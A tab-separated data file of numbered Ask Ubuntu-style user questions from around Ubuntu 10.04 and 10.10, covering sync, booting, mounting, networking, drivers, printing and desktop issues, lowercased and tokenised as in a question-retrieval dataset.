16574	syncronize folder on usb drive for ubuntu one	i have a folder on an external usb drive that i 'd like to synchronize in ubuntu one but when i right click on the folder , or any other folder on the usb drive for that matter , i do n't get the option to sync with ubuntu one . does anyone know how to make this work ?
16578	how do i uninstall nautilus-elementary ?	looking at the associated packages , i 'm concerned about breaking nautilus if i try and uninstall nautilus-elementary . can someone please advise me on the best way to remove it ?
16580	where are file associations stored ?	how does ubuntu or any other linux systems store file associations ? is there some /etc/asscociations file or something ? i know that i can right click on file and change it via `` open with '' , but i 'm just curious to know how it 's stored internally .
16584	how to connect and disconnect to a network manually in terminal ?	since the network manager is troubling me so much i want to replace it ( possibly wicd ornm from ppa : volanin ) . i do not know how to connect and disconnect to the network through the terminal without using network manager . i would like a command-line way of managing the network .
16585	not able to log in	when i boot my computer , i get the regular option to start ubuntu in the boot menu . after i log in with the correct password , it logs me back out again . i ran the recovery option , but it 's still the same . can someone please help ?
16586	how to access serial ubuntu host serial port on virtualbox guest os	i am having a difficult time trying to access a serial port on virtualbox . my guest os is windows xp and the host environment is linux ubuntu 10.04 . the serial modem device works perfectly in ubuntu . i can communicate with it via cutecom or just sending plain echo messages to it like so : echo `` id '' > /dev/ttys2 ubuntu settings and config i have added my user account to the following group : dialout and have set the serial using the following command : sudo setserial /dev/ttys2 but still no luck when trying to access it in my guest os . heres the settings i use to configure the serial port in virtualbox : * port mode : host device * port number : user - defined ( irq = 17 , i/o port = 0xec00 ) * port/file path : /dev/ttys2 i have tried all the different port modes even disconnected but still no luck . i have consulted the manual aswell but nothing works . what could be wrong ? is it virtualbox or are my ubuntu settings configured incorrectly ? please help thanks
16589	why is n't a hd video in 720p played without stops and glitches ?	when i try to watch a video with a high hd resolution 1280 x 720 h264 in ubuntu it is n't played smoothly . there stops and glitches occur . it 's no problem of the cpu or graphicscard , because under windows there are no problems like this . could it be a driver problem ? update : for me vlc player works best . no stops no glitches . smplayer also looks good but the performance leaks same as the standart ubuntu video player in my case .
16592	how can i tell whether ubuntu one file sync is working , and what progress it is making ?	it is not clear how the file sync aspect of ubuntu one is started , nor whether it is running at any given point in time , nor what the progress is being made during sync .
16593	which dvb-s satellite receivers work with ubuntu ?	i would like to connect my satellite dish to my laptop . can anybody recommend a usb dvb-s receiver that works well with ubuntu ?
16598	connect n vms over 2 nics to internet . bridging ? bonding ? both ?	what i have done many times and what works quite well is the following scenario : 1 nic connected to a bridge and then n vms connected to the network via that bridge ( on ubuntu 10.4 ) . my newest server now has 2 nics and i thought i do the same and in addition simply add the second nic to the same physical lan and to the bridge ( using bridge_ports eth0 eth1 ) ; hopefully getting redundancy and higher throughput . this does not seem to work very well . network traffic is extremely unstable irrespective of network load . even my ssh session keeps dropping out and reconnecting all the time . now my questions : should my approach basically work or am i doing something wrong ? e.g . fundamentally misunderstanding what bridges can do with 2 nics ? i read that there is also nic bonding that can combine two nics . does this have a higher chance of working ? and if yes would i then still add a bridge to the bond and the vms to the bridge ? for reference my /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto br0 iface br0 inet dhcp bridge_ports eth0 eth1 note : this question is the same as this one on server fault . since it got no answers and i am using ubuntu i hope to have more luck here . thanks , carsten
16600	crash after installing ubudsl	i tried to install ubudsl and during the installation ubuntu 10.10 crash ( the installation does n't complete ) now whenever i want to make a upgrade i got this message e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . and when prompt this command it crashes please i need your help . and sorry for my little english : )
16604	install ubuntu on intel mac	i 've recently taken up a position in an all mac workshop - we have intel based apple machines . can i dual boot ubuntu on my machine , if so how ?
16608	how do you fix `` failed command : identify device '' showing up in dmesg ?	i just got a new mushkin 60gb ssd , and it 's now my primary drive in the ata1 spot . i 've been getting these failed command : identify device errors which are preventing rebooting and shutdown . does anyone know what these could be caused by , or how to start troubleshooting ? note : i just installed fedora core 14 and i did not get this same issue at all . the ssd seems to work fine . i 've tried these kernels in ubuntu 10.04 , with both giving the same error : 2.6.32-22-generic 2.6.31-17-generic and this one in fedora core 14 , which works fine : 2.6.35.6-45.fc14.i686 there are some bug reports for ubuntu and fedora that mention this problem , and there does n't seem to be a solution : fedora bug 549981 launchpad bug 445852 launchpad bug 574462 here is a link to my entire dmesg from ubuntu . here is a link to my entire dmesg from fedora core 14 and the relevant ata1.00 parts from the ubuntu dmesg below : [ 59.804237 ] ata1 : drained 256 bytes to clear drq . [ 59.804244 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen [ 59.804249 ] ata1.00 : failed command : identify device [ 59.804254 ] ata1.00 : cmd ec/00:00:00:00:00/00:00:00:00:00/40 tag 0 pio 512 in [ 59.804256 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x4 ( timeout ) [ 59.804258 ] ata1.00 : status : { drdy } [ 59.804264 ] ata1 : hard resetting link [ 59.804266 ] ata1 : nv : skipping hardreset on occupied port [ 60.272036 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 60.352193 ] ata1.00 : configured for udma/133 [ 60.352204 ] ata1 : eh complete
16610	white screen with pointer after removing unity	i have the same problem . i am a newbie . i added the repository with sudo add apt-get-repository ppa : canonical-dx-team/une then i went to ubuntu software center and installed `` unity interface of ubuntu netbook edition '' . after installing i found a problem with user interface as it kept on flashing when mouse points to side panel . so i decided to remove it . i removed it form ubuntu software center . there were other unity related apps installed , but i did not remove then as i had no idea what they were about . now i ended up with a blank white screen with mouse pointer whenever i login . though i m able to login using gdm , but the screen is blank white . i tried to these commands also sudo apt-get remove gnome-shell sudo apt-get remove unity sudo restart gdm but they did not work at all i also tried sudo dpkg-reconfigure xserver-xorg it too did not work . note : i donot have any sort of graphics card or video card on my pc please help ! ! !
16612	how can i activate a panel-icon via a script ( or get its screen co-ordinates ; to click it ) ?	this question is in the context of lucid 10.04 desktop ( ie . no unity ) . i do most screen navigation via the keyboard ( not the mouse ) , so i 'm looking for a script solution to re-activating an app which has been `` minimized '' to the panel 's notification area . i 'll use skype as an example . wmctrl allows me enough access to normally-minimized windows , but when skype is `` minimized '' to the notification area , it simply goes `` off the radar '' as far as wmctrl is concerned . bearing in mind that icon positions in the notification area can vary , is there some way to determine the screen co-ordinates of skype 's panel icon , so i can `` click '' it using xdotool ( or a similar utility ) ? ... or maybe there is a more direct way to activate the `` dormant '' skype ? ... ( and i do n't mean the mouse ; ) here is the script , so far . hopefully it will make clear what i 'm trying to do : # ! /bin/bash procname= '' skype-wrapper '' windmask= '' skypeâ˘ '' if [ [ $ ( pgrep -x -n -c `` $ procname '' ) == 1 ] ] ; then wintitle= '' $ ( wmctrl -l |grep `` $ windmask '' |head -n 1 |sed -n `` s/^.\+ $ { hostname } \ ( . *\ ) /\1/p '' ) '' if [ `` $ wintitle '' = `` '' ] ; then echo `` click on skype 's panel-icon to show the main window '' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # how can i find the screen co-ordinates of skype 's panel icon # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # else # skype is running , and has ( at least ) one visible window which matches $ windmask . activate it . wmctrl -a `` $ wintitle '' fi else # the process is not currently running . start it . ( `` $ procname '' & ) fi
16613	error when installing xampp	i copied the xampp zip onto the desktop and executed this in a terminal : sudo tar xvfz xampp-linux-1.5.3a.tar.gz -c /opt when i tried to install xampp , i am getting this error tar ( child ) : xampp-linux-1.5.3a.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now any help will be appreciated . thanks in advance .
16619	browser automatically refreshes and home folder window opens	i am facing a very strange problem . out of the blue , my browser starts refreshing itself infinitely . my first guess was firefox is messing up . i installed chrome . but , it happens in chrome as well . other than that , sometimes my home folder automatically opens and keep opening itself infinitely . my next guess was mouse is faulty . replace the mouse - but same things . this happens even if i remove my keyboard . what can be the reason ? this started happening after i installed ubuntu 10.10 few days back . earlier on windows , everything was working fine . so , i am a bit skeptical to assume that this is a hardware fault . how to fix this problem ? update : xev gives this kind of result : keypress event , serial 36 , synthetic no , window 0x4200001 , root 0xb8 , subw 0x0 , time 29897358 , ( 237,791 ) , root : ( 1252,842 ) , state 0x10 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xmblookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x4200001 , root 0xb8 , subw 0x0 , time 29897603 , ( 237,791 ) , root : ( 1252,842 ) , state 0x10 , keycode 65 ( keysym 0x20 , space ) , same_screen yes , xlookupstring gives 1 bytes : ( 20 ) `` `` xfilterevent returns : false
16620	is there a command-line tool which returns the colour of the pixel based on screen co-ordinates ?	is there a command-line tool returns the colour value of a pixel , based solely on its screen co-ordinates . is there such a tool ? ( also : the tool should not require any user action . it is to run in a loop in a script . )
16621	how to set the default browser from the command line ?	tried to set the default browser using the gui tools but this did n't work overall . is there a way to configure the system wide default browser from command line ?
16627	can i use the chrome web store in chromium ?	can i use the chrome web store in chromium ? or do i have to install chrome for that .
16628	i want to use my old piii to learn basic linux stuff , should i use ubuntu ?	hey , everyone , i 'm using macs for years , and since i 'm fascinated by the terminal and command line , i try to learn the basic linux stuff , so i do n't care about gaming or web browsers , the only thing i want is just a basic , simple , stable , linux distribution . should i use ubuntu , or are there any better suggestion for me ? thanks . my old pcs configuration is : intel pentium iii cpu nvidia geforce mx-440 gpu 256 megabytes of ram a 30 gigabyte hard drive
16635	how to work on *.php pages without lamp	i am learning php , which means i 'd have to install lamp on my laptop and i think lamp would degrade my battery life which is already very low , so is there substitute to the lamp so that i can see how the php pages renders on the browser ? please recommend a software to test the php webpage rendering , some kind of virtual web server or something . ps : yes , battery is the main reason i am trying to avoid lamp , because each time the system boots lamp would start and i wont be working on that all the time .
16642	what is the best way to partition , and what is the best file-system for a new hard disk ?	bonus : what is the `` best '' filesystem for `` general '' use ? bonus 2 : if btrfs is supposedly `` better '' than ext3/4 , why is n't it the default ? bonus 3 : will creating a separate boot partition reduce boot time ? i currently have it set up as : ? g other stuff 4g swap 10g root ext4 17g home btrfs
16645	how to restrict the number of processes a user can start ?	we tried /etc/security/limits.conf , but that seems to have no effect . the used line for limits.conf looks as follows : myuser hard nproc 6 that is configuration for a server . i want to limit the processes started . ulimit limits the processes started from the shell ( if i understand that right ) . but in my case apache starts mapserver-processes , and that number have to be limited .
16650	create a new ssh user on ubuntu server	just created a new virtual ubuntu server and i 'm in the process of hardening it for production use . i currently have a root account . i want to do the following : create a new user ( let 's call them jim for the rest of this ) . i want them to have a /home/ directory . give jim ssh access . allow jim to su to root but not perform sudo operations . turn off root ssh access . move sshd off to a non-standard port to help stop brute-attacks . my problem lies with the first two items . i 've already found useradd but for some reason , i ca n't log in as a user created with it over ssh . do i need to beat sshd to allow this ?
16651	how do i export all the python docs of a package and get it into devhelp ?	at the moment , to read the documentation of a package , quickly for examle , i do this : > > > import quickly > > > help ( quickly ) > > > import quickly.widgets > > > help ( quickly.widgets ) > > > import quickly.widgets.text_editor > > > help ( quickly.widgets.text_editor ) and so on ... this is obviously very tedious . how can i export all of the quickly documentation , including all sub-packages , then get it to show up in the devhelp documentation browser ? exporting the documentation as html would be nice too . i would even be happy if some version of it existed on the web , but i ca n't seem to find one . note : by package i mean a python-package , not a .deb package .
16652	which programs can i use to edit pdf files ?	i know that there is a very similar question , but i 'm not interested in highlighting . what i 'm looking for is some tool in linux to edit pdf files . i 've tried pdfedit which did the work for me , but if freezes after a few edits . i 've tried this tool under ubuntu 9.10 and under kde fedora 14 and the same thing happens . i 've tried okular but the notations are too big to fill out exercises from pdf workbooks . is there any tool that suits this job ? i do n't care whether it is open source or i have to pay a reasonable price for it .
16657	problem with folders in ubuntu one	i 'm new at ubuntu one . i 've just uploaded a file and i want to get it into a folder . seems like a stupid question but i 've been trying and i could n't . how do i do it ? thanks .
16663	vista missing from grub bootlist after installing ubuntu	i installed ubuntu on a logical partition a while ago . when i get to the grub bootlist , vista is not there . what i get is this : ubuntu , with linux 2.6.32-26 ubuntu , with linux 2.6.32-26 ( recovery mode ) ubuntu , with linux 2.6.32-25 ubuntu , with linux 2.6.32-26 ( recovery mode ) ubuntu , with linux 2.6.32-24 ubuntu , with linux 2.6.32-26 ( recovery mode ) memory test ( memtest86+ ) windows vista ( loader ) ( on/dev/sda1 ) windows recovery environment ( loader ) ( on/dev/sda2 ) '' windows vista ( loader ) '' is an acer erecovery manager im guessing that grub installed on my primary partition so it overwrite the vista mbr and i dont have the option to boot vista . is there some way i can just edit the mbr and add vista to it or how will i have to repair this ? here is my boot script http : //pastebin.com/7hzfjbt7
16668	why has a4 borderless format disappeared for hp 6500 ?	2 months ago i 've bought hp officejet 6500 e709n printer . at the beginning there was a `` a4 borderless '' page format and i could print images without white borders . now this page format has disappeared and i can not remember making any changes apart from installing recent 10.10 updates . any ideas why ? how can i get it back ? thanks !
16672	where can i find ubuntu-10.04.1-netbook-i386.iso ?	in the various download repositories , there are 10.04.1 iso images of ubuntu desktop , alternate and server editions , but i can only find the original ubuntu-10.04-netbook-i386.iso , not an updated ubuntu-10.04.1-netbook-i386.iso . is the latter iso available somewhere ? if no , why does n't the ubuntu maintainers create one for this version .
16680	using a bittorrent client slows down internet connection	i have a problem while using transmission . i do n't know where it comes from because it does n't occur every time . sometime while downloading a torrent , i can not browse on the internet with a browser . or if i can it is extremly slow . i opened the correct port on my router . i limited the upload download to a reasonable amount ( 50/5 , my upload is very bad ) . i do n't not allow transmission to use pnp and nat-pmp . and this doe n't seem to be related to the download speed of a particular torrent : before limiting download i could download at 800ko/s and have no problem and sometime the problems occurs with download at 3ko/s . is anyone else having this problem ? i really do n't understand , is n't opening the correct port and disabling plug n play suppose to make transmission not interfere with http ?
16688	how can i add specific folders to places in mintmenu ?	how can i add specific folders to places in mintmenu ?
16695	is there a ppa with the latest version of libreoffice ?	there was recently another release of libreoffice , but it is a pain to have to manually go to their website and download the packages every time there is a new release . is there a ppa that always has the latest version of libreoffice ?
16700	how can i change my own user id ?	there is only one user on my system . how can i change its user id from the default of 1000 ? if there are additional steps that would be required in order to avoid breaking the login process on a typical desktop installation , those should be included as part of the answer .
16705	ca n't mount phone , `` according to mtab , /dev/sdb1 is already mounted on / ''	my mytouch slide was n't mounting , so i decided to open disk utility . my phone shows up but when i click `` mount '' it gives me this error : error mounting : mount exited with exit code 1 : helper failed with : mount : according to mtab , /dev/sdb1 is already mounted on / mount failed here 's my mtab : /dev/sdb1 / ext4 rw , errors=remount-ro , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/matthew/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=matthew 0 0 /dev/sdg1 /media/seagate\040goflex ext4 rw , nosuid , nodev , uhelper=udisks 0 0 edit : here 's my fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=3b0db205-2bdb-4c98-a506-6bdd3520d540 none swap sw 0 0
16707	what exactly does ubuntu share with other debian based distributions ?	what exactly does ubuntu share with other debian based distributions ? what do all debian based distributions share in common that other distributions do n't ?
16708	how to profile gnome desktop start ?	how can i profile what programs are making use of the hd to load after i type in my login credentials ? it 's taking a bit too much time lately .
16717	error when trying to get movies off my camera	how do i retrieve movies and audio files from my canon powershot s5 is camera ? shotwell only sees the pictures . mounting the camera via `` places > canon digital camera '' and then clicking twice on the resulting desktop icon yields this error : could not display `` gphoto2 : // [ usb:001,002 ] / '' there is nothing in /media . update : output of sudo fdisk -l disk /dev/sda : 40.0 gb , 40007761920 bytes 255 heads , 63 sectors/track , 4864 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3ee33ee2 device boot start end blocks id system /dev/sda1 2364 2612 1999872 82 linux swap / solaris /dev/sda2 * 1 2364 18979840 83 linux /dev/sda3 2613 4864 18089159+ f w95 ext 'd ( lba ) /dev/sda5 2613 4864 18089158+ b w95 fat32 partition table entries are not in disk order solution : install gphotofs , then nautilus shows camera contents similar to a standard usb storage device ( though note that gphotofs does not yet support adding to or deleting contents ) .
16724	why is there always only the latest development milestone available for download ?	what 's the reason why we can not download ubuntu+1 alpha 1 once ubuntu+1 alpha 2 has been released ? it would be helpful to roughly find out when regressions started to show up ( sometimes it 's not as easy as simply downgrading one package ) .
16726	ca n't print , cups package corrupted and hangs on re-install	when i upgraded to ubuntu 10.4 ( maverick ) , the upgrade process got stuck on the post-installation of the cups package . i had to kill processes and run several forced updates before i could finally get regular updated . ever since i ca n't print - the printed file gets messed up and crashes the printer . i also ca n't re-install cups , as each time the installation hangs and i have to kill it before it completes . i tried to find a workaround for this problem , but in vain . does anyone know how to bypass this ? or at least why can the post-installation hang , and how to re-install a problematic package ? some system specs and other hints : dell d630 laptop running ubuntu 10.4 , gnome desktop , standard lan network , printing to an lpd server . everything worked fine on 9.10 . also , the printed files themselves are not corrupted . the problem does not seem to be evince-specific , but common to all printouts .
16728	hide current working directory in terminal	as a default , the terminal prompt shows something like : user @ system : /folder1/folder2/folder3/folder4 $ the deeper you go into the filesystem , the less space is left for typing in commands . can i change this to only show something like : > i mean , i can just type pwd to show where i am at . ; )
16730	default mount options on auto-mounted ntfs partitions ( how to add `noexec` and `fmask=0111` ? )	i use auto-mounting of external usb devices , and it works as expected , except that ntfs partitions are mounted with executability flag on . for example : /dev/sdb1 on /media/elements type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) all normal files are -rwxrwxrwx on this partition . i am not happy with the xs . i know i can have it mounted the way i want if i pass the fmask=0111 option . now i use lucid , and suppose it uses some new auto-mounting mechanism ( gvfs-mount ? ) , but i do n't really know how the default mounting options can be changed now . gconf settings in /system/storage/default_options/ntfs/mount_options have no effect . so , how do i make fmask=0111 the default automounting option for all ntfs partitions ? ( i 'd be grateful also if someone explains how the current automounting mechanism works , how to configure it , and if the default mounting options are hard-coded , what i have to recompile to change them ) . i know that i can put a line in the /etc/fstab and/or mount manually , but this is not the solution i want , because 1 ) i do n't want to edit /etc/fstab for each and every external drive i use , 2 ) fstab records appear in the places pane of nautilus , even if the drives are not present . the questions is how to change the defaults . update : installing udisks 1.0.1+git20100614 or later gives more sensible defaults for ntfs , the problem which remains is how the user can specify arbitrary mount options .
16732	facebook and flash - why does n't facebook recognise that i have flash installed ?	for some reason when i try to upload photos to facebook from the website , it tells me i need to upgrade my flash player : i definitely have flash installed , as can be seen in the picture , and working fine in youtube etc . my question is two-fold : 1 ) does anyone know if this a problem with the version of flash i 'm running , ubuntu , or facebook itself ? i get the same problem in chrome and firefox , so i know it 's not the browser . 2 ) is there a workaround or fix for this ? as far as i can tell i 'm running the very latest flash ( on 64-bit ubuntu 10.10 ) - but maybe that 's the problem ? note : before everyone starts jumping up and down about using shotwell or digikam or some such to upload photos to facebook , i know about these ( and do use shotwell at times ) . unfortunately shotwell only lets you upload to a profile , but does n't ( as far as i can tell ) let you upload to a facebook page of which i am an administrator , so i am forced do it through the website . using the simple uploader as seen in the first picture is horribly slow and tedious , and often times out while uploading . of course if anyone knows of any alternate ways to upload to facebook pages i 'd love to hear 'em !
16733	adjusting resolution for individual wine programs	how can i specify the resolution of a program to 800*600 , and for other programs to full screen or other specific resolutions ?
16736	menu missing in lotus notes 8 and eclipse in unity	i installed lotus notes 8.5.2 on 10.10 netbook using unity desktop . at first lotus notes showed its menu . suddenly ( not sure if i did something ) the menu disappeared . when i start up using gnome desktop , the menu still is there . unity shows only the file menu for notes with the only entry for closing notes .
16738	djplay : no sound coming out	i installed jack and djplay on ubuntu 10.10 , they seem to launch and connect fine . then i open audio files in djplay , and start playing them , the oscilloscopes start moving . but no sound comes out . i am a newbie so i left everything configured as default . maybe it is just that i do n't know how to use djplay and there is just a button to press somewhere ? in the screenshot , note how the levels are moving in the `` mixer '' window but no signal in the levels in the upper-right side of the screen , not sure what it means . any idea ?
16746	packaging a java web application : reuse tomcat6 or separate process ?	i would like to package my java web application http : //kunagi.org/ for ubuntu ( and debian ) . should the package create a user kunagi , provide an init script and configuration files for the existing tomcat6 , so that my application runs in a separate jvm instance with its own privileges ? or should the package just drop the web application into /var/lib/tomcat6/webapps/ , so that it runs with the tomcat process and privileges ?
16747	can not append to mbox file error while fetching mail in evolution	whenever i try to download mail using pop3 in evolution i get the following message error while fetching mail . can not append message to mbox file : /home/roland/.evolution/mail/local/inbox : file too large if anyone could give me an idea of how to fix this i would be greatful
16753	packaging a java web application : .war or symlinks to dependencies ?	i would like to package my java web application http : //kunagi.org/ for ubuntu ( and debian ) . should the package install a .war file which contains all the required dependencies ( .jar files ) ? or should the package install the unpacked web application without .jar files and place symlinks into the web-inf/libs/ directory ?
16755	realtek rtl8111e8168b ethernet driver does n't work	fortunately , i have an old pci ethernet card that works fine . but unfortunately my lan card embedded in my asus ( p7h55-m/usb3 ) motherboard does n't work . who could me help ? i get this error when starting the `` installation '' step of hhlp 's answer : /home/henry64/r8168-8.020.00/src/r8168_n.c : in function ‘rtl_get_eeprom’ : > /home/henry64/r8168-8.020.00/src/r8168_n.c:1857 : warning : ‘ret’ may be used uninitialized in this function [ : 48 : r8168 : unexpected operator depending module . please wait . load module r8168 completed .
16757	kickstart file is ignored by the installer	i have fallowed this guide to create a kickstart file to install ubuntu automatically . however the problem is that when i boot the menu item label autoinstall menu label ^auto install kernel /casper/vmlinuz append file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz file=/cdrom/ks.cfg -- it does n't start the installer . i 've tried using automatic-ubiquity as one of the parameters , but still it seems that kickstart file is n't used . is there a way to make this work , or is there another way ( preferably without using network , like fai ) .
16758	removing firefox in ubuntu with all add-ons like it never existed	i have been using firefox for a long time in ubuntu , i downloaded some add-ons but it made firefox extremely slow , even if i remove them nothing will change . i tried to remove firfox also but re-installing it will somehow recover the same firefox i had , it seems it write some info somewhere that even if you remove firefox it will keep them.also i am not able to use see any flash videos or website with firefox ( chrome works fine ) ..honestly i tampered with plug-in settings in firfox that this happened . but right now i ca n't do anything to overwrite the setting ... my question is how i can remove firefox in a way to remove any previous traces and re-install a new version like for the first time ? thanks
16766	wubi wo n't boot after a kernel update	i use windows vista 32bit and have a wubi install of the 10.10 rc . it worked great , until one day when i upgraded the kernel and rebooted . now , whenever i select ubuntu from the windows boot menu , the screen goes black for half a second and i am returned to the boot menu . is there a way to repair this ?
16768	asus 1000he wireless issues	a fresh install of 10.10 on my asus 1000he has caused some wireless issues . at home , i have no issues with the wireless from my linksys wrt54g router with wpa2 security . on campus at my university , my netbook constantly connects to and disconnects from the unsecured wireless ( that you must provide credentials to access ) . sometimes , if i 'm lucky , it will stay connected for 5 minutes and i can check my email before it kicks off again . this was not an issue before 10.10 . i believe i was running a proprietary broadcom driver in previous releases of ubuntu , but under `` additional drivers '' i no longer find any options for drivers . any help ? please let me know if there 's more information that would be helpful ( and how i could go about retrieving it ) . thank you . edit : relevant hardware information from sudo lspci -- 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 02 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801g ( ich7 family ) ide controller [ 8086:27df ] ( rev 02 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801gbm/ghm ( ich7 family ) sata ahci controller [ 8086:27c5 ] ( rev 02 ) 01:00.0 network controller [ 0280 ] : ralink rt2860 [ 1814:0781 ] 03:00.0 ethernet controller [ 0200 ] : atheros communications ar8121/ar8113/ar8114 gigabit or fast ethernet [ 1969:1026 ] ( rev b0 )
16769	ogg support for ubuntu music app	i 've just paid for ubuntu music and downloaded the app for my android phone , but it appears ogg vorbis files are not supported . this is a definite deal breaker and i think i 'm going to cancel until this is added , unless this feature is imminent . how soon is this likely to be added ?
16770	popper email notifier not working	using maverick 64bit i downloaded popper email notifier today . installed it from the v023 deb . https : //launchpad.net/popper i configured it , and the test tab shows i configured everything properly . i ca n't get popper to appear in the notification menu . i have restarted gnome-pannel , restarted my computer , reinstalled the app . no luck . i checked the /usr/share/indicators/messages/applications/ folder , and there 's only the defaults there . anyone know how to fix this ? even if someone knows what file i can drop into that folder to make it work that 'd be great . edit : i wonder if it 's because i removed the evolution-indicator package ? thanks !
16776	how to switch the editor in mc ( midnight commander ) from nano to mcedit ?	using ubuntu 10.10 the editor in mc ( midnight commander ) is nano . how can i switch to the internal mc editor ( mcedit ) ?
16777	connecting to a wireless network	i have a machine that i just installed ubuntu server on . the only problem is that i do not know how to connect it to a wireless network , and i can not use a network cable to connect it to my router . when trying to list the network cards , only the loopback interface showed up : $ â ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric 1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) which was unexpected , as both my ethernet network interface ( eth0 ) and wireless network interface ( wlan0 ) showed up when doing the same in a fresh installation of ubuntu desktop 10.10 . so , my two questions are : how can i install the wireless drivers ( and packages i could download etc . ) and/or set up the wireless network interface to work properly , and how can i connect to a wpa-encrypted wireless network from the command line ? edit : i ended up uninstalling ubuntu server and installing ubuntu desktop instead , then configuring the wireless network through the gui and making it boot into command line instead of gnome .
16780	my hardware needs a module to be blacklisted to work , how can i get this fix shipped ?	i have an acer timeline 1830t . when i install 10.10 and 11.04 it needs to have the acer-wmi module blacklisted for wireless to work . i think i need to file a bug on the linux kernel but i am not sure . i 've heard the term `` quirk '' being thrown around by developers when it comes to fixing something so that it works on certain pieces of hardware . is this indeed a kernel bug ? what steps should i take to ensure that this gets reported so that everyone with my laptop does n't have to go through this over and over ?
16789	can unity based on compiz already be fully used ?	last , time several month ago , i installed unity to test it in maverick . i had the problem that it did n't work as expected . instead of unity i only got a white screen , i 'm not 100 % sure what the problem was , but it should have to do with my radeon xpress graphics card i think . is there another method of getting unity to work together with this graphics card in maverick ?
16795	mouse 's forward and back buttons do n't work	i have two buttons on my mouse to go forwards and back : they used to work all right in firefox , but now they do n't any more . i 've since switched to google chrome ( the package from google.com/chrome , not chromium ) . i have n't changed any configuration to do with input devices in the mean time . xev does n't seem to recognize the buttons . the others work well . even the weird zoom-slider on this mouse is recognized by xev . it 's only the forwards and back buttons that do n't do anything . how do i get them to work ? the mouse is a logitech vx revolution in case that 's important . edit at dec. 10th , 11pm : the back button has just started working , after an update . i 'm confused . : p the forwards button still does n't work . xev recognizes the back button now , not the other one .
16796	if unity will be touch friendly , will window buttons become easier to touch ?	some people say that unity is touch friendly and i even saw a video of an ubuntu developer showing it off on a dell touch screen . it looks touch friendly and all but the window buttons still look too tiny to be touch friendly . there could be a gesture or something to close the windows easily , but not everyone will know about them and will aim at the little buttons .
16798	where are empathy 's contact-links stored ?	i linked a bunch of contacts from msn and google talk with the new empathy feature , now i want to export this configuration to my desktop so i do n't have to make the same changes again and again . does anyone know where this contact-linking configuration is stored ? i did n't find it under ~/.config , ~/.local/share or ~/.mission-control .
16801	cs4326/7 sound chipset on thinkpad 600e	ok , i know this has been a problem for a while , and i know by now this really old pentium ii laptop is really really really obsolete . however , i have installed lubuntu 10.10 on this laptop and things seem to work fine except the sound . now i 've read and gone through a bunch of tutorials and guides to working around this , none of which have worked . i have gone through this ubuntu bug report and that does n't work either . the problem i think is that the latest workaround is ( understandably ) about two ubuntu versions behind . now i 'm not sure what has changed since then to make that workaround not work , but i would appreciate any help . thanks
16803	poor compiz performance on nvidia 9500 gt	i have just installed ubuntu on both my laptop and my workstation . my laptop is a somewhat older one , with a 2ghz centrino core 2 duo processor , an nvidia geforce go 7300 graphics card , and 2 gigabytes of system ram . compiz+emerald works flawless and super fast on this computer in every aspect . my workstation is a dual core ( not core duo ) 2.5ghz system , with a 1gb geforce 9500gt card and 4 gigabytes of system ram . 3d performance with compiz is super slow here though , and other operations feel heavy as well . opening a new tab in firefox for example takes a couple of seconds . both computers have the same driver version installed ( 173.14.28 ) . i am new to this os , any suggestions on how i could improve performance on my workstation ? many thanks !
16807	how can i change another user 's `` about me '' photo ?	is there a way for a user with administrative privileges to change another user 's `` about me '' photo ?
16808	can i set a default `` about me '' photo ?	is there a way to set a default `` about me '' photo so that all users created in the future start off with the same user image on the login screen ?
